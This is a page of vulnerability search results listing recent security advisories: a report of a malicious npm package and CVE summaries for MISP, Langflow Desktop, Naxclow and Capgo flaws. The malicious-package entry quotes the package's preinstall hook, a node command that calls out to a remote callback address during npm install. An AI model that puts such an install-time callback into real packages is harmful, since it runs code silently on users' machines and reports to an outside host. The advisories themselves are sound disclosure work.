CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

64091 matches found

OSSF Malicious Packages•added yesterday•3 views

Malicious code in ect-839201 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0ac6cc7433a67e0087dfa415071c9338be630c2166cd38ac371afadbdd0161e3 package.json declares a preinstall lifecycle hook that runs node -e "require'http'.get'http://10.107.121.85:8001/callback839201'" on npm install. Thi...

5.3AI score

Exploits0References11

NVD•added yesterday•2 views

CVE-2026-54396

An information disclosure vulnerability exists in the MISP AuthKey edit functionality. When a validation error occurs during an AuthKey edit request, the user dropdown was populated using the attacker-controlled AuthKey.userid value from the submitted request data. An authenticated user with...

5.3CVSS

Exploits0References1

CVE•added yesterday•7 views

CVE-2026-54397

MISP CVE-2026-54397 affects the non-REST event editing path. An authenticated user with event edit permissions could tamper with submitted form data to assign an event to a sharing_group_id the user is not authorized to use when distribution is set to sharing group distribution. The non-REST save...

6.1CVSS5.2AI score

Exploits0References1

Cvelist•added yesterday•6 views

CVE-2026-54396 MISP AuthKey edit endpoint allows authenticated user email enumeration

5.3CVSS

Exploits0References1

EUVD•added yesterday•4 views

EUVD-2026-36552

A mass assignment vulnerability exists in MISP’s sharing group creation endpoint. When creating a new sharing group, the controller did not remove a user-supplied id field before saving the submitted data. In CakePHP, supplying a primary key in the save data can cause a create followed by save...

8.4CVSS5.4AI score

Exploits0References1

IBM Security Bulletins•added yesterday•4 views

Security Bulletin: Unauthenticated Insecure Direct Object Reference (IDOR) Vulnerability in Langflow Desktop Image Download Endpoint

Summary IBM Langflow Desktop contains a vulnerability in its image retrieval functionality where the GET /api/v1/files/images/flowid/filename endpoint fails to enforce authentication and ownership validation, allowing any unauthenticated user to access image files by supplying a valid flow...

7.5CVSS5.2AI score0.00028EPSS

Exploits0Affected Software1

Cvelist•added yesterday•6 views

CVE-2026-42932 Naxclow IoT Platform Generation of Predictable Numbers or Identifiers

Naxclow device identifiers use fixed manufacturing prefixes combined with sequential counters, producing a fully predictable and enumerable identifier space. Because the platform also exposes an endpoint that reveals the current identifier high-water mark, the active fleet can be enumerated...

6.9CVSS

Exploits0References2

Circl•added yesterday•4 views

CVE-2026-48006

creationtimestamp| type| source ---|---|--- 2026-06-12 18:09:49+00:00| seen| https://bsky.app/profile/cve.skyfleet.blue/post/3mo4dkybdiu2q...

8.7CVSS5AI score0.00042EPSS

Exploits0References1

NVD•added yesterday•4 views

CVE-2026-53982

Capgo Console prior to 12.28.2 contains a denial-of-service vulnerability in its account deletion flow that allows an attacker to block authentication and onboarding functions by triggering account deletion while a device identifier is linked to the active session. The platform incorrectly...

7.1CVSS

Exploits0References3